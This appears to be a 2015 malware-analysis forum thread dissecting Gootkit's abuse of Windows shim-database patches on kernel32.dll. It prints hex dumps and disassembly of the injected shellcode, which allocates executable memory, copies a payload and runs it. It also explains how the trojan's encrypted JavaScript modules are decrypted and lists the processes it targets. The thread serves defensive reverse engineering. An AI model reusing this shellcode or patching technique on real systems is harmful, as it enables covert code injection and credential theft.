A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #25616  by EP_X0FF
 Sat Apr 11, 2015 1:04 pm
@rinn
The only particular problem here is to recover all used _PATCHBITS, well and fill them properly. Meeh.

If you still interested most of code our loved mzH copy-pasted from here https://github.com/evil-e/sdb-explorer/ ... explorer.c and other files from there (from copyrighted msdn guy source) ;)
 #25617  by tomchop
 Sat Apr 11, 2015 2:30 pm
Yes sdb-explorer works pretty well for extracting the patch bits:
Code: Select all
Trying to process patch by tag type: PATCH_TAGID

 00000000:  02 00 00 00  2a 17 00 00  d6 16 00 00  00 80 0c 00  
 00000010:  00 00 00 00  6b 00 65 00  72 00 6e 00  65 00 6c 00  
 00000020:  33 00 32 00  2e 00 64 00  6c 00 6c 00  00 00 00 00  
 00000030:  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  
 00000040:  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  
 00000050:  00 00 00 00  55 8b ec 83  e4 f8 81 ec  94 00 00 00  
 [...snip...]  
 000019D0:  00 00 00 00  e8 33 71 07  00 eb f9 00  00 00 00 00  
 000019E0:  00 00 00 

module     : kernel32.dll
opcode     : 2 REPLACE
actionSize : 5930
patternSize: 5846
RVA        : 0x000c8000
Bytes: 55 8b ec 83 e4 f8 81 ec 94 [snip] a4 5f 5e 5b 8b e5 5d c3 

Code:
	00000000  55               push ebp
	00000001  8bec             mov ebp, esp
	00000003  83e4f8           and esp, 0xfffffff8
        [snip]
	000016cf  5f               pop edi
	000016d0  5e               pop esi
	000016d1  5b               pop ebx
	000016d2  8be5             mov esp, ebp
	000016d4  5d               pop ebp
	000016d5  c3               ret

module     : kernel32.dll
opcode     : 4 MATCH
actionSize : 92
patternSize: 8
RVA        : 0x000c5f4b
Bytes: 00 00 00 00 00 00 00 00 

Code:
	00000000  0000             add [eax], al
	00000002  0000             add [eax], al
	00000004  0000             add [eax], al
	00000006  0000             add [eax], al

module     : kernel32.dll
opcode     : 2 REPLACE
actionSize : 227
patternSize: 143
RVA        : 0x000c5f4b
Bytes: 55 8b ec 51 51 64 a1 30 00 00 00 8b 40 0c 8b 48 0c b8 47 54 4b 00 39 41 4c 74 70 89 41 4c 8b 09 56 be 4b 00 45 00 8b 51 18 eb 09 3d 6b 00 65 00 74 0b 8b 09 8b 41 30 8b 00 3b c6 75 ee 8b 71 18 85 d2 74 46 85 f6 74 42 83 65 fc 00 8d 45 f8 57 6a 40 68 00 30 00 00 50 6a 00 8d 45 fc c7 45 f8 00 28 00 00 50 6a ff 8d 82 18 53 04 00 ff d0 8b 7d fc 85 ff 74 13 81 c6 00 80 0c 00 b9 d6 16 00 00 f3 a4 8b 45 fc 50 ff d0 5f 5e 8b e5 5d c3 

Code:
	00000000  55               push ebp
	00000001  8bec             mov ebp, esp
	00000003  51               push ecx
	00000004  51               push ecx
	00000005  64a130000000     mov eax, [fs:0x30]
	0000000b  8b400c           mov eax, [eax+0xc]
	0000000e  8b480c           mov ecx, [eax+0xc]
	00000011  b847544b00       mov eax, 0x4b5447
	00000016  39414c           cmp [ecx+0x4c], eax
	00000019  7470             jz 0x8b
	0000001b  89414c           mov [ecx+0x4c], eax
	0000001e  8b09             mov ecx, [ecx]
	00000020  56               push esi
	00000021  be4b004500       mov esi, 0x45004b
	00000026  8b5118           mov edx, [ecx+0x18]
	00000029  eb09             jmp 0x34
	0000002b  3d6b006500       cmp eax, 0x65006b
	00000030  740b             jz 0x3d
	00000032  8b09             mov ecx, [ecx]
	00000034  8b4130           mov eax, [ecx+0x30]
	00000037  8b00             mov eax, [eax]
	00000039  3bc6             cmp eax, esi
	0000003b  75ee             jnz 0x2b
	0000003d  8b7118           mov esi, [ecx+0x18]
	00000040  85d2             test edx, edx
	00000042  7446             jz 0x8a
	00000044  85f6             test esi, esi
	00000046  7442             jz 0x8a
	00000048  8365fc00         and dword [ebp-0x4], 0x0
	0000004c  8d45f8           lea eax, [ebp-0x8]
	0000004f  57               push edi
	00000050  6a40             push 0x40
	00000052  6800300000       push 0x3000
	00000057  50               push eax
	00000058  6a00             push 0x0
	0000005a  8d45fc           lea eax, [ebp-0x4]
	0000005d  c745f800280000   mov dword [ebp-0x8], 0x2800
	00000064  50               push eax
	00000065  6aff             push 0xffffffff
	00000067  8d8218530400     lea eax, [edx+0x45318]
	0000006d  ffd0             call eax
	0000006f  8b7dfc           mov edi, [ebp-0x4]
	00000072  85ff             test edi, edi
	00000074  7413             jz 0x89
	00000076  81c600800c00     add esi, 0xc8000
	0000007c  b9d6160000       mov ecx, 0x16d6
	00000081  f3a4             rep movsb
	00000083  8b45fc           mov eax, [ebp-0x4]
	00000086  50               push eax
	00000087  ffd0             call eax
	00000089  5f               pop edi
	0000008a  5e               pop esi
	0000008b  8be5             mov esp, ebp
	0000008d  5d               pop ebp
	0000008e  c3               ret

module     : kernel32.dll
opcode     : 4 MATCH
actionSize : 92
patternSize: 8
RVA        : 0x000c5f3d
Bytes: 00 00 00 00 00 00 00 00 

Code:
	00000000  0000             add [eax], al
	00000002  0000             add [eax], al
	00000004  0000             add [eax], al
	00000006  0000             add [eax], al

module     : kernel32.dll
opcode     : 2 REPLACE
actionSize : 98
patternSize: 14
RVA        : 0x000c5f3d
Bytes: 83 04 24 02 60 9c e8 03 00 00 00 9d 61 c3 

Code:
	00000000  83042402         add dword [esp], 0x2
	00000004  60               pushad
	00000005  9c               pushfd
	00000006  e803000000       call 0xe
	0000000b  9d               popfd
	0000000c  61               popad
	0000000d  c3               ret

module     : kernel32.dll
opcode     : 4 MATCH
actionSize : 89
patternSize: 5
RVA        : 0x0004ee05
Bytes: 90 90 90 90 90 

Code:
	00000000  90               nop
	00000001  90               nop
	00000002  90               nop
	00000003  90               nop
	00000004  90               nop

module     : kernel32.dll
opcode     : 2 REPLACE
actionSize : 91
patternSize: 7
RVA        : 0x0004ee05
Bytes: e8 33 71 07 00 eb f9 

Code:
	00000000  e833710700       call 0x77138
	00000005  ebf9             jmp 0x0
I've attached a PE file I crafted from the patch, so it's ready to load in IDA. There's a flag you have to change at some point if you want it to make a debug run (ZF when at 0x4011ea IIRC). There a blogpost in the pipeline for a more detailed analysis of how this works due next week at $dayjob.
Attachments
Crafted PE containing patch bits.
(4.47 KiB) Downloaded 64 times
 #25618  by EP_X0FF
 Sat Apr 11, 2015 4:15 pm
Where one of patches is the code that sets PAGE_EXECUTE_READWRITE for .reloc section of kernel32.dll and other is call to main shellcode. Unfortunately these stuff is bugged as hell (probably main malware module bad at locating required addresses for patches) so it result in my tests in multiple crashes - some on attempt to change .reloc protection, some is misplaced "call FixRelocProtect".

Insert code in BaseThreadInitThunk->[save eflags/registers, execute NtProtectVirtualMemory on payload in .reloc, ->execute payload shellcode (described in previous posts)]-> return to BaseThreadInitThunk.

The only thing is properly calculated in my case by trojan is .reloc offset :D
 #25625  by tomchop
 Mon Apr 13, 2015 9:52 am
That's weird, the malware has no problem running on my Win7 (x86 or x64) VMs. When I open say chrome.exe in Ollydb, I see the .reloc section in kernel32 is patched and contains the shellcode. If you're trying to debug it, then maybe the best solution is to set your JIT debugger and replace the first byte of the patch with 0xCC...
 #25626  by SomeUnusedName
 Mon Apr 13, 2015 11:15 am
tomchop wrote:I was wondering, does anyone know how I can recover the code (or at least the assembly) of the node.js (javascript) code of the malware? I've successfully managed to recover malware.js and spyware.js which have lots of "require" statements from
If you have the main module (for example 'node32.dll'), it contains a table of JavaScript file names and a pointer to the encrypted contents. It uses RC4 to decrypt the contents, the RC4 key state is hardcoded into the RC4 subroutine. After decryption, it uses zlib (if I remember correctly) to decompress the javascript files.

gootkit_crypto.js contains code for TEA, Base64 and RC4, where both the RC4 and TEA key are hardcoded into the script itself.
 #25629  by tomchop
 Mon Apr 13, 2015 12:24 pm
Yeah, I have the main module and I think I've identified the correct JS table. I need to look for the RC4 subroutine (I think I may have stumbled upon it early into my analysis). Thanks a lot for the tip! Will let you know of my findings.
 #25630  by EP_X0FF
 Mon Apr 13, 2015 4:39 pm
tomchop wrote:That's weird, the malware has no problem running on my Win7 (x86 or x64) VMs. When I open say chrome.exe in Ollydb, I see the .reloc section in kernel32 is patched and contains the shellcode. If you're trying to debug it, then maybe the best solution is to set your JIT debugger and replace the first byte of the patch with 0xCC...
Just out of curiousity, are your VM's fully patched?
 #25703  by EP_X0FF
 Tue Apr 21, 2015 5:23 am
Gootkit with RedirectEXE.

MD5 7551c8026938b4acd149b1551393715f
SHA1 30d9b07d6eff616bdf91f74a515b75169eb7888a
SHA256 d1c1e59d29e6dca483ed18e7523f8c2a57d519d4035a347af4c9f9354c970edb

https://www.virustotal.com/en/file/d1c1 ... 429593320/
Attachments
pass: infected
(185.92 KiB) Downloaded 69 times
 #25706  by p4r4n0id
 Tue Apr 21, 2015 9:19 am
Compared with ed3d622c54b474c6caef540a3147731a1b2c7d4a7563b97731880bb15305d47d,looks like a few apps and browsers were added:

Previous list:

explorer.exe
chrome.exe
opera.exe
iexplore.exe
lsass.exe
firefox.exe

New list:

explorer.exe
safari.exe
chrome.exe
opera.exe
iexplore.exe
lsass.exe
mozilla.exe
firefox.exe
firef.exe
maxthon.exe
msmsgs.exe
myie.exe
avant.exe
navigator.exe
thebat.exe
outlook.exe
msimn.exe
thunderbird.exe
iron.exe
dragon.exe
epic.exe
seamonkey.exe

p4r4n0id
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7